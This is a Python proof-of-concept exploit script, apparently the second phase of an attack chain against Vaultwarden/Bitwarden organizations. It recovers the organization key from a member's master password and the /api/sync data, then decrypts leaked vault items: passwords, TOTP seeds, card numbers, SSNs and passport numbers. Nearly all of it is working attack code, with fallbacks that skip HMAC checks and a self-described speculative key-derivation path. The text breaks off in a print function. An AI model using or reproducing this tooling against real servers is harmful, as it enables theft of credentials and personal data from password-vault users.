#!/usr/bin/env python3
"""
CVE-2026-26012 — Phase 2: Organization Key Recovery & Cipher Decryption
========================================================================

This script completes the exploitation chain by:
  1. Retrieving the encrypted org key (any member already has it)
  2. Deriving the decryption chain from the master password
  3. Decrypting the leaked ciphers from Phase 1

Bitwarden/Vaultwarden encryption model:
  Master Password + Email
      → (PBKDF2 or Argon2) → Master Key
      → (HKDF-Expand)       → Stretched Key (encKey 32B || macKey 32B)
      → (AES-256-CBC)       → User Symmetric Key  [from /api/sync profile.key]
      → (AES-256-CBC)       → RSA Private Key      [from /api/sync profile.privateKey]
      → (RSA-OAEP-SHA1)     → Organization Key     [from /api/sync profile.organizations[].key]
      → (AES-256-CBC)       → Decrypted cipher data

Key insight: the organization key is shared with ALL members. The collection
access control is purely server-side. Any member who has the org key can
decrypt any cipher in the org — the CVE provides the missing ciphers.

Requirements:
  pip install cryptography
  pip install argon2-cffi   (optional, only if KDF is Argon2id)

Usage:
  # Full chain: fetch keys + decrypt leaked export
  python3 poc_decrypt.py \
      --url https://vw.example.com \
      --token "eyJhbG..." \
      --email user@example.com \
      --master-password "MyPassword" \
      --org-id "org-uuid" \
      --leaked-json results.json

  # Just decrypt (if you already have the org key in hex)
  python3 poc_decrypt.py \
      --org-key-hex "aabbccdd..." \
      --leaked-json results.json

Disclaimer: Authorized security testing only.
"""

import argparse
import json
import sys
import base64
import hashlib
import hmac as hmac_mod
import ssl
import urllib.request
import urllib.error
import os
from typing import Tuple, Optional

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding, hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding as asym_padding
from cryptography.hazmat.primitives.kdf.hkdf import HKDFExpand

try:
    import argon2.low_level
    HAS_ARGON2 = True
except ImportError:
    HAS_ARGON2 = False


# ═════════════════════════════════════════════
# 1. EncString Parser
# ═════════════════════════════════════════════

# Bitwarden EncString types:
#   0 = AES-256-CBC (no HMAC — legacy, rare)
#   1 = AES-128-CBC + HMAC-SHA256
#   2 = AES-256-CBC + HMAC-SHA256 (most common for cipher fields)
#   3 = RSA-2048-OAEP-SHA256
#   4 = RSA-2048-OAEP-SHA1 (used for org key encryption)
#   5 = RSA-2048-OAEP-SHA256 + HMAC-SHA256 (deprecated)
#   6 = RSA-2048-OAEP-SHA1 + HMAC-SHA256 (deprecated)

class EncString:
    """Parsed Bitwarden encrypted string ("EncString").

    Accepted wire formats:
      * ``"<type>.<iv>|<ct>|<mac>"`` / ``"<type>.<iv>|<ct>"`` for types 0, 1, 2
        (AES-CBC; the MAC segment is optional at parse time)
      * ``"<type>.<ct>"`` for types 3, 4 (RSA-OAEP)
      * ``"<type>.<ct>|<mac>"`` for types 5, 6 (RSA-OAEP + HMAC)
      * headerless ``"<iv>|<ct>|<mac>"`` (treated as type 1) or
        ``"<iv>|<ct>"`` (treated as type 0) for legacy data

    Attributes (all set by the constructor):
        raw:      the original string.
        enc_type: integer encryption type.
        iv:       decoded IV bytes for symmetric types, otherwise None.
        ct:       decoded ciphertext bytes.
        mac:      decoded MAC bytes, or None when absent.

    Raises:
        ValueError: if *raw* is empty or not a str, the type header is not an
            integer or is unknown, a required segment is missing, or a segment
            is not valid base64 (``binascii.Error`` is a ``ValueError``).
    """

    # Symmetric AES-CBC types: payload is "IV|CT[|MAC]".
    _SYMMETRIC_TYPES = (0, 1, 2)
    # RSA-OAEP types: payload is just "CT".
    _RSA_TYPES = (3, 4)
    # RSA-OAEP types with an appended HMAC: payload is "CT|MAC".
    _RSA_HMAC_TYPES = (5, 6)

    def __init__(self, raw: str):
        self.raw = raw
        self.enc_type = None
        self.iv = None
        self.ct = None
        self.mac = None
        self._parse(raw)

    @staticmethod
    def _b64_required(segment: str, what: str) -> bytes:
        """Base64-decode a mandatory segment, rejecting an empty one."""
        if not segment:
            raise ValueError(f"EncString is missing its {what}")
        return base64.b64decode(segment)

    def _parse(self, raw: str):
        if not raw or not isinstance(raw, str):
            raise ValueError(f"Invalid EncString: {raw!r}")

        if "." in raw:
            # "." is not part of the base64 alphabet, so it can only be the
            # separator between the type header and the payload.
            header, _, data = raw.partition(".")
            try:
                self.enc_type = int(header)
            except ValueError:
                raise ValueError(f"Invalid EncString type header: {header!r}") from None
        else:
            # Legacy headerless form: three pieces => type 1, otherwise type 0.
            data = raw
            self.enc_type = 1 if len(raw.split("|")) == 3 else 0

        parts = data.split("|")

        if self.enc_type in self._SYMMETRIC_TYPES:
            if len(parts) < 2:
                raise ValueError(
                    f"EncString type {self.enc_type} requires 'IV|CT[|MAC]', "
                    f"got {len(parts)} segment(s)"
                )
            self.iv = self._b64_required(parts[0], "IV")
            self.ct = self._b64_required(parts[1], "ciphertext")
            if len(parts) > 2 and parts[2]:
                self.mac = base64.b64decode(parts[2])

        elif self.enc_type in self._RSA_TYPES:
            self.ct = self._b64_required(data, "ciphertext")

        elif self.enc_type in self._RSA_HMAC_TYPES:
            self.ct = self._b64_required(parts[0], "ciphertext")
            if len(parts) > 1 and parts[1]:
                self.mac = base64.b64decode(parts[1])

        else:
            raise ValueError(f"Unknown EncString type: {self.enc_type}")

    def __repr__(self):
        return f"EncString(type={self.enc_type}, ct={len(self.ct)}B)"


# ═════════════════════════════════════════════
# 2. Crypto Operations
# ═════════════════════════════════════════════

def decrypt_aes_cbc(ct: bytes, iv: bytes, enc_key: bytes,
                     mac_key: bytes = None, mac: bytes = None) -> bytes:
    """Decrypt AES-CBC ciphertext, optionally authenticating it first.

    The HMAC-SHA256 check over ``iv || ct`` runs only when BOTH *mac* and
    *mac_key* are non-empty; otherwise the data is decrypted unauthenticated.

    Args:
        ct:      ciphertext.
        iv:      CBC initialization vector.
        enc_key: AES key.
        mac_key: HMAC-SHA256 key, or None.
        mac:     expected HMAC tag, or None.

    Returns:
        Plaintext with PKCS#7 padding removed.

    Raises:
        ValueError: on HMAC mismatch, or (from the unpadder) invalid padding.
    """
    authenticate = bool(mac) and bool(mac_key)
    if authenticate:
        expected_tag = hmac_mod.new(mac_key, iv + ct, hashlib.sha256).digest()
        # Constant-time comparison to avoid leaking how many bytes matched.
        if not hmac_mod.compare_digest(expected_tag, mac):
            raise ValueError("HMAC verification failed — wrong key or corrupted data")

    aes = Cipher(algorithms.AES(enc_key), modes.CBC(iv)).decryptor()
    padded_plaintext = b"".join((aes.update(ct), aes.finalize()))

    pkcs7 = padding.PKCS7(128).unpadder()
    return pkcs7.update(padded_plaintext) + pkcs7.finalize()


def decrypt_enc_string(enc_str: "EncString", enc_key: bytes, mac_key: bytes) -> bytes:
    """Decrypt a symmetric EncString (type 0, 1 or 2) to raw bytes.

    Args:
        enc_str: parsed EncString; must be of type 0, 1 or 2.
        enc_key: AES key.
        mac_key: HMAC-SHA256 key used to authenticate types 1 and 2.

    Returns:
        The PKCS#7-unpadded plaintext.

    Raises:
        ValueError: if the type is not symmetric, if an HMAC-authenticated
            type (1 or 2) has no MAC segment or no MAC key was supplied, or if
            HMAC verification / unpadding fails.
    """
    if enc_str.enc_type not in (0, 1, 2):
        raise ValueError(f"Expected symmetric EncString, got type {enc_str.enc_type}")

    # decrypt_aes_cbc only verifies when both a MAC and a MAC key are present.
    # Without these checks, a type 1/2 string with its MAC stripped (or a call
    # without a MAC key) would be decrypted unauthenticated.
    if enc_str.enc_type in (1, 2):
        if not enc_str.mac:
            raise ValueError(f"EncString type {enc_str.enc_type} is missing its HMAC")
        if not mac_key:
            raise ValueError(f"EncString type {enc_str.enc_type} requires an HMAC key")

    return decrypt_aes_cbc(
        ct=enc_str.ct,
        iv=enc_str.iv,
        enc_key=enc_key,
        mac_key=mac_key,
        mac=enc_str.mac,
    )


def decrypt_rsa_oaep(ct: bytes, private_key, sha_version: int = 1) -> bytes:
    """Decrypt RSA-OAEP ciphertext with *private_key*.

    Args:
        ct:          RSA ciphertext.
        private_key: object exposing ``decrypt(ct, padding)``, e.g. a
                     ``cryptography`` RSA private key.
        sha_version: 1 selects SHA-1; any other value selects SHA-256. The
                     same hash is used for both OAEP and MGF1.

    Returns:
        The decrypted plaintext bytes.
    """
    digest = hashes.SHA1() if sha_version == 1 else hashes.SHA256()
    oaep_padding = asym_padding.OAEP(
        mgf=asym_padding.MGF1(algorithm=digest),
        algorithm=digest,
        label=None,
    )
    return private_key.decrypt(ct, oaep_padding)


def decrypt_enc_string_rsa(enc_str: "EncString", private_key) -> bytes:
    """Decrypt an asymmetric EncString (type 3, 4, 5 or 6).

    Types 3 and 5 use RSA-OAEP with SHA-256; types 4 and 6 use SHA-1.
    For types 5 and 6, the appended HMAC is not verified here; this function
    has no MAC key to check it with.

    Raises:
        ValueError: if *enc_str* is not an RSA EncString type.
    """
    oaep_sha_by_type = {3: 256, 4: 1, 5: 256, 6: 1}
    sha_version = oaep_sha_by_type.get(enc_str.enc_type)
    if sha_version is None:
        raise ValueError(f"Expected asymmetric EncString, got type {enc_str.enc_type}")
    return decrypt_rsa_oaep(enc_str.ct, private_key, sha_version)


# ═════════════════════════════════════════════
# 3. Key Derivation Chain
# ═════════════════════════════════════════════

def derive_master_key(password: str, email: str,
                      kdf_type: int, kdf_iterations: int,
                      kdf_memory: Optional[int] = None,
                      kdf_parallelism: Optional[int] = None) -> bytes:
    """
    Derive the 32-byte master key from master password + email.

    KDF type 0 = PBKDF2-SHA256, salt = normalized email.
    KDF type 1 = Argon2id, salt = SHA-256(normalized email);
                 kdf_memory is in MiB (default 64), kdf_parallelism
                 defaults to 4, kdf_iterations is the Argon2 time cost.

    The email is normalized with ``strip().lower()``, so stray surrounding
    whitespace (e.g. from a pasted CLI argument) cannot silently change the
    salt. NOTE(review): believed to match how Bitwarden clients normalize the
    login email; confirm against the client version in use.

    Raises:
        ValueError: for an unknown kdf_type.

    Exits the process with status 1 if Argon2id is requested but
    argon2-cffi is not installed.
    """
    secret = password.encode("utf-8")
    normalized_email = email.strip().lower().encode("utf-8")

    if kdf_type == 0:
        return hashlib.pbkdf2_hmac(
            "sha256",
            secret,
            normalized_email,
            kdf_iterations,
            dklen=32,
        )

    if kdf_type == 1:
        if not HAS_ARGON2:
            print("[!] Argon2id KDF detected but argon2-cffi is not installed.")
            print("    Install with: pip install argon2-cffi")
            sys.exit(1)

        # Salt = SHA-256 of the normalized email (raw 32 bytes)
        salt = hashlib.sha256(normalized_email).digest()

        # Bitwarden API returns kdfMemory in MiB; argon2-cffi memory_cost is
        # in KiB, so convert: MiB * 1024 = KiB.
        memory_kib = (kdf_memory or 64) * 1024

        return argon2.low_level.hash_secret_raw(
            secret=secret,
            salt=salt,
            time_cost=kdf_iterations,
            memory_cost=memory_kib,
            parallelism=kdf_parallelism or 4,
            hash_len=32,
            type=argon2.low_level.Type.ID,
        )

    raise ValueError(f"Unknown KDF type: {kdf_type}")


def stretch_key_hkdf(master_key: bytes) -> Tuple[bytes, bytes]:
    """
    Stretch the master key into (enc_key, mac_key) with HKDF-Expand-SHA256.

    The master key is used directly as the HKDF pseudo-random key (no
    Extract step). Each output is 32 bytes, with info labels b"enc" and
    b"mac" respectively.
    """
    def expand(label: bytes) -> bytes:
        kdf = HKDFExpand(algorithm=hashes.SHA256(), length=32, info=label)
        return kdf.derive(master_key)

    return expand(b"enc"), expand(b"mac")


def stretch_key_legacy(master_key: bytes) -> Tuple[bytes, bytes]:
    """
    Alternative HMAC-SHA256 expansion of the master key, tried as a fallback.

        enc_key = HMAC-SHA256(master_key, master_key || 0x01)
        mac_key = HMAC-SHA256(master_key, enc_key    || 0x02)

    NOTE(review): this is not HKDF-Expand (compare stretch_key_hkdf), and it
    is unconfirmed that any Bitwarden client version derived keys this way.
    Treat it as a speculative fallback.
    """
    def keyed_sha256(message: bytes) -> bytes:
        return hmac_mod.new(master_key, message, hashlib.sha256).digest()

    first_half = keyed_sha256(master_key + b"\x01")
    second_half = keyed_sha256(first_half + b"\x02")
    return first_half, second_half


def try_decrypt_user_key(encrypted_key_str: str, master_key: bytes,
                          debug: bool = False) -> Tuple[bytes, bytes, str]:
    """
    Try multiple strategies to decrypt the user symmetric key.

    Strategies tried in order:
      1. HKDF-Expand stretched key (modern Bitwarden)
      2. Alternative HMAC-based stretched key (stretch_key_legacy)
      3. Raw master key as enc_key, no MAC (very old accounts, type 0)
      4. HKDF stretched key, skip HMAC verification (fallback)
      5. HMAC-stretched key, skip HMAC verification (fallback)

    Args:
        encrypted_key_str: profile.key EncString from /api/sync.
        master_key:        32-byte master key from derive_master_key.
        debug:             print intermediate values.

    Returns:
        (enc_key, mac_key, strategy_name). A 64-byte decrypted key is split
        32/32. A 32-byte key is returned in both slots, because it has no
        separate MAC half.

    Raises:
        ValueError: if the EncString is not symmetric, or if every strategy
            fails. A summary of the failures is printed first in that case.
    """
    enc_str = EncString(encrypted_key_str)
    if enc_str.iv is None:
        # Asymmetric EncStrings carry no IV, so AES-CBC cannot be attempted
        # (and the debug output below would crash on iv.hex()).
        raise ValueError(
            f"User key must be a symmetric EncString, got type {enc_str.enc_type}"
        )

    if debug:
        mac = enc_str.mac
        print(f"    [debug] User key EncString type: {enc_str.enc_type}")
        print(f"    [debug] IV:  {enc_str.iv.hex()[:16]}... ({len(enc_str.iv)}B)")
        print(f"    [debug] CT:  {enc_str.ct.hex()[:16]}... ({len(enc_str.ct)}B)")
        print(f"    [debug] MAC: {mac.hex()[:16] if mac else 'None'}..."
              f" ({len(mac) if mac else 0}B)")

    hkdf_enc, hkdf_mac = stretch_key_hkdf(master_key)
    legacy_enc, legacy_mac = stretch_key_legacy(master_key)

    # (name, enc_key, mac_key, verify_hmac) in priority order. For the
    # skip-HMAC entries, PKCS#7 unpadding plus the key-length check below are
    # the only guards against accepting output produced by a wrong key.
    strategies = [
        ("HKDF-Expand (modern)", hkdf_enc, hkdf_mac, True),
        ("HMAC-based stretch (legacy)", legacy_enc, legacy_mac, True),
        ("Raw master key (no stretch)", master_key, None, False),
        ("HKDF-Expand, skip HMAC", hkdf_enc, hkdf_mac, False),
        ("HMAC-stretch, skip HMAC", legacy_enc, legacy_mac, False),
    ]

    errors = []
    for name, enc_key, mac_key, verify_hmac in strategies:
        if debug:
            print(f"    [debug] Trying: {name}")
            print(f"    [debug]   enc_key: {enc_key.hex()[:16]}...")
            if mac_key:
                print(f"    [debug]   mac_key: {mac_key.hex()[:16]}...")

        try:
            # Verify only when this strategy asks for it AND both the tag and
            # the key exist.
            check = verify_hmac and bool(mac_key) and bool(enc_str.mac)
            raw = decrypt_aes_cbc(
                ct=enc_str.ct,
                iv=enc_str.iv,
                enc_key=enc_key,
                mac_key=mac_key if check else None,
                mac=enc_str.mac if check else None,
            )

            if len(raw) == 64:
                result_enc, result_mac = raw[:32], raw[32:]
            elif len(raw) == 32:
                result_enc, result_mac = raw, raw
            else:
                raise ValueError(f"Unexpected decrypted key length: {len(raw)} bytes")

            # A real key looks like random bytes; all zeros indicates garbage.
            if all(b == 0 for b in raw):
                raise ValueError("Decrypted key is all zeros")

        except Exception as e:
            errors.append((name, str(e)))
            if debug:
                print(f"    [debug]   FAILED: {e}")
            continue

        if debug:
            print(f"    [debug]   SUCCESS → {len(raw)}B key")
        return result_enc, result_mac, name

    # All strategies failed
    print("\n[!] All key derivation strategies failed:")
    for name, err in errors:
        print(f"    ✗ {name}: {err}")
    print("\n    Possible causes:")
    print("    1. Incorrect master password")
    print("    2. Incorrect email (it is lowercased and used as the KDF salt)")
    print("    3. Account uses an unsupported KDF configuration")
    print("    4. The profile.key was re-encrypted with a method not yet supported")
    print("\n    Try with --debug for detailed diagnostics")
    raise ValueError("Could not decrypt user symmetric key with any known strategy")


def decrypt_user_private_key(encrypted_pk_str: str,
                              user_enc: bytes,
                              user_mac: bytes):
    """
    Unwrap the user's RSA private key (profile.privateKey).

    The EncString is decrypted with the user symmetric key halves. The
    resulting bytes are loaded as an unencrypted DER private key.

    Returns:
        A ``cryptography`` private-key object.

    Raises:
        ValueError: from EncString parsing, symmetric decryption, or DER
            loading.
    """
    wrapped = EncString(encrypted_pk_str)
    der_encoded = decrypt_enc_string(wrapped, user_enc, user_mac)
    private_key = serialization.load_der_private_key(der_encoded, password=None)
    return private_key


def decrypt_org_key(encrypted_org_key_str: str,
                    private_key) -> Tuple[bytes, bytes]:
    """
    Unwrap the organization key (profile.organizations[].key) with RSA.

    The RSA-OAEP hash is selected from the EncString type by
    decrypt_enc_string_rsa. Type 4 (SHA-1) is expected here.

    Returns:
        (org_enc_key, org_mac_key), 32 bytes each.

    Raises:
        ValueError: if the decrypted key is not exactly 64 bytes.
    """
    key_material = decrypt_enc_string_rsa(EncString(encrypted_org_key_str), private_key)
    if len(key_material) != 64:
        raise ValueError(f"Unexpected org key length: {len(key_material)} bytes")
    return key_material[:32], key_material[32:]


# ═════════════════════════════════════════════
# 4. Cipher Decryption
# ═════════════════════════════════════════════

def safe_decrypt_field(value: Optional[str], enc_key: bytes, mac_key: bytes) -> Optional[str]:
    """Best-effort decryption of a single cipher field.

    Returns:
        * None if *value* is falsy or not a string (field absent);
        * the decrypted text as UTF-8, with undecodable bytes replaced;
        * otherwise a ``"[DECRYPT_ERROR: <reason>]"`` marker string.

    Any ``Exception`` raised while parsing or decrypting is converted into
    that marker instead of propagating.
    """
    if value and isinstance(value, str):
        try:
            plaintext = decrypt_enc_string(EncString(value), enc_key, mac_key)
            return plaintext.decode("utf-8", errors="replace")
        except Exception as exc:
            return f"[DECRYPT_ERROR: {exc}]"
    return None


def decrypt_cipher(cipher: dict, org_enc: bytes, org_mac: bytes) -> dict:
    """Decrypt every encrypted field of one cipher with the organization key.

    Each key is looked up in camelCase first, then in its PascalCase form,
    so either serialization of the cipher object is accepted.

    Args:
        cipher:  raw cipher object as loaded from the leaked JSON.
        org_enc: organization AES key.
        org_mac: organization HMAC key.

    Returns:
        A new dict of plaintext values. Fields that fail to decrypt hold the
        ``"[DECRYPT_ERROR: ...]"`` marker produced by safe_decrypt_field;
        absent fields are None. A ``login``/``card``/``identity`` sub-dict is
        added for cipher types 1/3/4. ``attachments`` is added only when the
        cipher has any.
    """
    def pick(obj, camel, default=None):
        # camelCase key first, then its PascalCase twin, then *default*.
        pascal = camel[0].upper() + camel[1:]
        return obj.get(camel, obj.get(pascal, default))

    def dec(value):
        return safe_decrypt_field(value, org_enc, org_mac)

    result = {
        "id": pick(cipher, "id"),
        "type": pick(cipher, "type"),
        "collectionIds": pick(cipher, "collectionIds", []),
        "revisionDate": pick(cipher, "revisionDate"),
        "name": dec(pick(cipher, "name")),
        "notes": dec(pick(cipher, "notes")),
        "fields": [
            {
                "name": dec(pick(custom, "name")),
                "value": dec(pick(custom, "value")),
                "type": pick(custom, "type"),
            }
            for custom in (pick(cipher, "fields") or [])
        ],
    }

    kind = result["type"]
    if kind == 1:  # Login
        login = pick(cipher, "login") or {}
        result["login"] = {
            "username": dec(pick(login, "username")),
            "password": dec(pick(login, "password")),
            "totp": dec(pick(login, "totp")),
            "uris": [dec(pick(entry, "uri")) for entry in (pick(login, "uris") or [])],
        }
    elif kind == 3:  # Card
        card = pick(cipher, "card") or {}
        card_keys = ("cardholderName", "brand", "number", "expMonth", "expYear", "code")
        result["card"] = {key: dec(pick(card, key)) for key in card_keys}
    elif kind == 4:  # Identity
        identity = pick(cipher, "identity") or {}
        identity_keys = (
            "title", "firstName", "middleName", "lastName",
            "company", "email", "phone", "ssn", "passportNumber",
            "licenseNumber", "address1", "address2", "address3",
            "city", "state", "postalCode", "country", "username",
        )
        result["identity"] = {key: dec(pick(identity, key)) for key in identity_keys}
    # Type 2 (Secure Note) has no extra payload; its text is the top-level "notes".

    # Attachments: metadata only (the file contents are not fetched here).
    attachments = pick(cipher, "attachments") or []
    if attachments:
        result["attachments"] = [
            {
                "id": pick(att, "id"),
                "fileName": dec(pick(att, "fileName")),
                "size": pick(att, "size"),
                "sizeName": pick(att, "sizeName"),
            }
            for att in attachments
        ]

    return result


# ═════════════════════════════════════════════
# 5. HTTP Client (reused from Phase 1)
# ═════════════════════════════════════════════

class VWClient:
    """Minimal JSON-over-HTTP(S) client for a Vaultwarden/Bitwarden server.

    Authentication is supplied either as a bearer token (set_bearer_token) or
    as a raw ``Cookie`` header (set_cookie). Both are attached to every GET.
    """

    def __init__(self, base_url: str, verify_ssl: bool = True, timeout: float = 30.0):
        """
        Args:
            base_url:   server root, e.g. ``https://vw.example.com``. A
                        trailing slash is stripped.
            verify_ssl: when False, certificate and hostname checks are
                        disabled (e.g. for self-signed test servers).
            timeout:    per-request socket timeout in seconds. Without one,
                        ``urlopen`` may block indefinitely on a stalled server.
        """
        self.base_url = base_url.rstrip("/")
        self.timeout = timeout
        self.auth_header = None
        self.cookie_header = None
        self.ssl_ctx = None
        if not verify_ssl:
            self.ssl_ctx = ssl.create_default_context()
            self.ssl_ctx.check_hostname = False
            self.ssl_ctx.verify_mode = ssl.CERT_NONE

    def set_bearer_token(self, token: str):
        """Use *token* as the bearer token. A leading "Bearer " prefix (any case) is accepted."""
        token = token.strip()
        if token.lower().startswith("bearer "):
            token = token[7:].strip()
        self.auth_header = f"Bearer {token}"

    def set_cookie(self, cookie: str):
        """Send *cookie* verbatim (whitespace-trimmed) as the Cookie header."""
        self.cookie_header = cookie.strip()

    def get(self, path: str) -> dict:
        """GET ``base_url + path`` and return the decoded JSON body.

        Raises:
            RuntimeError: on an HTTP error status (the first 300 chars of the
                body are included), a connection failure, an empty body, an
                HTML body (often a sign of a login redirect), or invalid JSON.
        """
        url = f"{self.base_url}{path}"
        req = urllib.request.Request(url)
        req.add_header("Accept", "application/json")
        if self.auth_header:
            req.add_header("Authorization", self.auth_header)
        if self.cookie_header:
            req.add_header("Cookie", self.cookie_header)

        kwargs = {"timeout": self.timeout}
        if self.ssl_ctx:
            kwargs["context"] = self.ssl_ctx
        try:
            with urllib.request.urlopen(req, **kwargs) as resp:
                body = resp.read()
        # HTTPError subclasses URLError, so it must be handled first.
        except urllib.error.HTTPError as e:
            err_body = e.read().decode(errors="replace")
            raise RuntimeError(f"HTTP {e.code}: {err_body[:300]}") from e
        except urllib.error.URLError as e:
            raise RuntimeError(f"Request to {url} failed: {e.reason}") from e

        if not body or not body.strip():
            raise RuntimeError("Empty response")
        decoded = body.decode("utf-8", errors="replace")
        if decoded.strip().startswith("<"):
            raise RuntimeError("Got HTML instead of JSON (invalid auth?)")
        try:
            return json.loads(decoded)
        except ValueError as e:
            raise RuntimeError(f"Invalid JSON response from {url}: {e}") from e


# ═════════════════════════════════════════════
# 6. Key Recovery from API
# ═════════════════════════════════════════════

def fetch_sync_data(client: VWClient) -> dict:
    """Return the /api/sync payload (profile, keys, organizations, ...).

    Domain data is excluded via the ``excludeDomains`` query flag.
    """
    sync_path = "/api/sync?excludeDomains=true"
    return client.get(sync_path)


def fetch_prelogin(client: VWClient, email: str, timeout: float = 30.0) -> dict:
    """Fetch the account's KDF parameters via ``POST /api/accounts/prelogin``.

    Args:
        client:  supplies ``base_url`` and the optional ``ssl_ctx``. No auth
                 or cookie header is sent with this request.
        email:   account email, sent as ``{"email": ...}``.
        timeout: socket timeout in seconds, so a stalled server cannot hang
                 the script indefinitely.

    Returns:
        The decoded JSON response (recover_org_key reads kdf / kdfIterations /
        kdfMemory / kdfParallelism from it).

    Raises:
        RuntimeError: on an HTTP error status, a connection failure, or a
            body that is not valid JSON. This is the same error style as
            VWClient.get.
    """
    url = f"{client.base_url}/api/accounts/prelogin"
    payload = json.dumps({"email": email}).encode("utf-8")
    req = urllib.request.Request(url, data=payload, method="POST")
    req.add_header("Content-Type", "application/json")
    req.add_header("Accept", "application/json")

    kwargs = {"timeout": timeout}
    if client.ssl_ctx:
        kwargs["context"] = client.ssl_ctx
    try:
        with urllib.request.urlopen(req, **kwargs) as resp:
            body = resp.read()
    # HTTPError subclasses URLError, so it must be handled first.
    except urllib.error.HTTPError as e:
        err_body = e.read().decode(errors="replace")
        raise RuntimeError(f"Prelogin failed: HTTP {e.code}: {err_body[:300]}") from e
    except urllib.error.URLError as e:
        raise RuntimeError(f"Prelogin request to {url} failed: {e.reason}") from e

    try:
        return json.loads(body)
    except ValueError as e:
        raise RuntimeError(f"Prelogin returned invalid JSON: {e}") from e


def recover_org_key(client: VWClient, email: str, master_password: str,
                    org_id: str, debug: bool = False) -> Tuple[bytes, bytes]:
    """
    Full key recovery chain:
      master_password → master_key → [stretch] → user_key → RSA_key → org_key

    Args:
        client:          authenticated VWClient (used for prelogin and /api/sync).
        email:           account email (KDF salt input).
        master_password: account master password.
        org_id:          organization UUID. It is matched case-insensitively
                         and whitespace-trimmed against the organizations in
                         the sync profile.
        debug:           print intermediate values.

    Returns:
        (org_enc_key, org_mac_key), 32 bytes each.

    Exits the process (status 1) if the user key, private key, target
    organization, or its key is missing from the sync response. Decryption
    failures propagate as exceptions.
    """
    print("\n[*] === Key Recovery Chain ===\n")

    # Step 1: Get KDF parameters
    print("[1/6] Fetching KDF parameters...")
    prelogin = fetch_prelogin(client, email)
    kdf_type = prelogin.get("kdf", prelogin.get("Kdf", 0))
    kdf_iter = prelogin.get("kdfIterations", prelogin.get("KdfIterations", 600000))
    kdf_mem = prelogin.get("kdfMemory", prelogin.get("KdfMemory"))
    kdf_par = prelogin.get("kdfParallelism", prelogin.get("KdfParallelism"))
    kdf_names = {0: "PBKDF2-SHA256", 1: "Argon2id"}
    print(f"       KDF: {kdf_names.get(kdf_type, f'unknown({kdf_type})')}, "
          f"iterations: {kdf_iter}"
          f"{f', memory: {kdf_mem} MiB' if kdf_mem else ''}"
          f"{f', parallelism: {kdf_par}' if kdf_par else ''}")

    if debug:
        print(f"    [debug] Raw prelogin response: {json.dumps(prelogin, indent=2)}")

    # Step 2: Derive master key
    print("[2/6] Deriving master key...")
    master_key = derive_master_key(master_password, email, kdf_type, kdf_iter, kdf_mem, kdf_par)
    print(f"       Master key: {master_key[:4].hex()}...{master_key[-4:].hex()} "
          f"({len(master_key)} bytes)")

    # Step 3: Fetch encrypted keys from /api/sync
    print("[3/6] Fetching encrypted keys from /api/sync...")
    sync = fetch_sync_data(client)

    # `or` guards against keys that are present but explicitly null.
    profile = sync.get("profile", sync.get("Profile")) or {}
    enc_user_key = profile.get("key", profile.get("Key"))
    enc_private_key = profile.get("privateKey", profile.get("PrivateKey"))
    organizations = profile.get("organizations", profile.get("Organizations")) or []

    if debug:
        print(f"    [debug] profile.key (first 80 chars): {enc_user_key[:80] if enc_user_key else 'None'}...")
        print(f"    [debug] profile.privateKey length: {len(enc_private_key) if enc_private_key else 'None'}")
        print(f"    [debug] Organizations count: {len(organizations)}")

    if not enc_user_key:
        print("[!] Could not find encrypted user key in sync response")
        sys.exit(1)
    if not enc_private_key:
        print("[!] Could not find encrypted private key in sync response")
        sys.exit(1)

    # Find the target org. UUIDs are compared case-insensitively so an
    # upper-case --org-id still matches the server's representation.
    wanted = org_id.strip().lower()
    target_org = next(
        (org for org in organizations
         if str(org.get("id", org.get("Id", ""))).strip().lower() == wanted),
        None,
    )

    if target_org is None:
        print(f"[!] Organization {org_id} not found in user's profile")
        print("    Available orgs:")
        for org in organizations:
            oid = org.get("id", org.get("Id"))
            oname = org.get("name", org.get("Name"))
            print(f"      - {oname} ({oid})")
        sys.exit(1)

    enc_org_key = target_org.get("key", target_org.get("Key"))
    org_name = target_org.get("name", target_org.get("Name", "?"))
    if not enc_org_key:
        print(f"[!] Organization {org_name} ({org_id}) has no encrypted key in the sync response")
        sys.exit(1)
    print(f"       Organization: {org_name}")
    print("       Found encrypted user key, private key, and org key")

    # Step 4: Decrypt user symmetric key (multi-strategy)
    print("[4/6] Decrypting user symmetric key...")
    user_enc, user_mac, strategy = try_decrypt_user_key(enc_user_key, master_key, debug=debug)
    print(f"       Strategy:     {strategy}")
    print(f"       User enc key: {user_enc[:4].hex()}... ({len(user_enc)} bytes)")
    print(f"       User mac key: {user_mac[:4].hex()}... ({len(user_mac)} bytes)")

    # Step 5: Decrypt RSA private key
    print("[5/6] Decrypting RSA private key...")
    try:
        rsa_private = decrypt_user_private_key(enc_private_key, user_enc, user_mac)
    except ValueError as e:
        # Deliberate fallback: if HMAC handling fails on the private key,
        # retry without authentication. PKCS#7 unpadding and DER parsing are
        # then the only integrity checks.
        if "HMAC" not in str(e):
            raise
        print("       HMAC failed on private key, retrying without verification...")
        enc_str = EncString(enc_private_key)
        der_bytes = decrypt_aes_cbc(
            ct=enc_str.ct, iv=enc_str.iv,
            enc_key=user_enc, mac_key=None, mac=None,
        )
        rsa_private = serialization.load_der_private_key(der_bytes, password=None)

    print(f"       RSA private key: {rsa_private.key_size}-bit")

    # Step 6: Decrypt org key with RSA
    print("[6/6] Decrypting organization key...")
    org_enc, org_mac = decrypt_org_key(enc_org_key, rsa_private)
    print(f"       Org enc key: {org_enc[:4].hex()}... ({len(org_enc)} bytes)")
    print(f"       Org mac key: {org_mac[:4].hex()}... ({len(org_mac)} bytes)")

    print("\n[+] Organization key recovered successfully!")
    print(f"    Org key (hex): {(org_enc + org_mac).hex()}")

    return org_enc, org_mac


# ═════════════════════════════════════════════
# 7. Pretty Printer
# ═════════════════════════════════════════════

# Display labels for cipher type codes, used by print_decrypted_cipher and by
# the per-type breakdown in main().
TYPE_NAMES = {
    1: "Login",
    2: "SecureNote",
    3: "Card",
    4: "Identity",
}


def print_decrypted_cipher(cipher: dict, index: int):
    """Pretty-print one decrypted cipher to stdout as a box-drawn block.

    Args:
        cipher: dict in the shape produced by decrypt_cipher.
        index:  1-based position shown in the header line.

    decrypt_cipher stores None for absent fields, so a ``dict.get`` default
    would never apply. Values are therefore passed through ``shown`` to print
    a placeholder instead of the literal "None". Identity entries holding a
    "[DECRYPT_ERROR..." marker are hidden.
    """
    ctype = cipher.get("type", "?")
    type_str = TYPE_NAMES.get(ctype, f"Unknown({ctype})")
